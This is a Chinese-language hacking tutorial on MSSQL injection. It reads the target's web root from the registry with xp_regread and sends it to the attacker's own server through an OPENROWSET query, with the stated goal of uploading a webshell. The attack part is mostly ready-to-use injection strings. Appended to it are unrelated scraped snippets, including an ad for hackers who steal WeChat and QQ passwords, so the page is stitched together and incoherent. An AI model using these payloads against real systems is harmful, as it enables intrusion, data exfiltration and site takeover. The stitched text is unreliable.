渗透中用openrowset搞shell的 ***
得到SQL注入点,首先想到的是BACKUPWEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%$~
首先在自己机器建立SQL数据库
然后在对方机器上建立个表createtable[dbo].[fenggou]([cha8][char](255))--
在对方执行DECLARE@resultvarchar(255)execmaster.dbo.xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\VirtualRoots','/',@resultoutputinsertintofenggou(cha8)values('selecta.*FROMOPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'',''select*FROMpubs.dbo.authorswhereau_fname='''''+@result+''''''')ASa');--
这样fenggou这个表里就会有这样一条记录selecta.*FROMOPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码','select*FROMpubs.dbo.authorswhereau_fname=''D:\WEB,,1''')ASa
不用说,''D:\WEB就是从注册表里读出的物理路径拉.然后执行DECLARE@a1char(255)set@a1=(selectcha8FROMfenggou)exec(@a1);--
等于执行了selecta.*FROMOPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码','select*FROMpubs.dbo.authorswhereau_fname=''D:\WEB,,1''')ASa
OK,这时你在你机器上SQL事件追踪器上就会显示select*FROMpubs.dbo.authorswhereau_fname='D:\WEB,,1'
哇哈哈哈哈哈物理路径到手了写小马传大马吧~
如何永久删除微信聊天记录?手机内总是存留大量的微信聊天记录,而且难以彻底清除,甚至几年前的聊天记录都存留在微信空间里,对自己的隐私构成严重的威胁,万一数据被别人窃取,那后果不堪设想,所以如何永久删除微...
联播+ 春节将至,中华大地到处洋溢着喜庆的气息,氤氲着幸福的味道。无论国事多么繁忙,习近平总书记总要抽出几天时间走到群众中间,给大家拜年,并为他们送去最深情的祝福。 一声声问候,一句句祝福,...
转载民众号“苍衣社”的一篇文章,医生的亲眼所见,即先容了病症,也感人至深。 民众号可以关注一下,其他原创文章也挺有趣。 苍衣社脸叔的微博:https://weibo.com/u/632363095...
岳麓书院导游词(岳麓书院介绍) 岳麓书院,主体建筑面积有31000多平方米,分为书院主体、附属文庙及新建的中国书院博物馆。岳麓书院占地面积25000平方米,现...
黑客怎样盗微信密码(黑客技术盗qq密码视频)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客...
本文导读目录: 1、电影保持爱你里面森美最后出现那个女朋友阿梅(MAY)是谁? 2、麦兜响当当结尾处阿MAY讲的台词 3、阿May和麦兜是什么关系? 4、皇甫圣华女友阿may的个人资料?...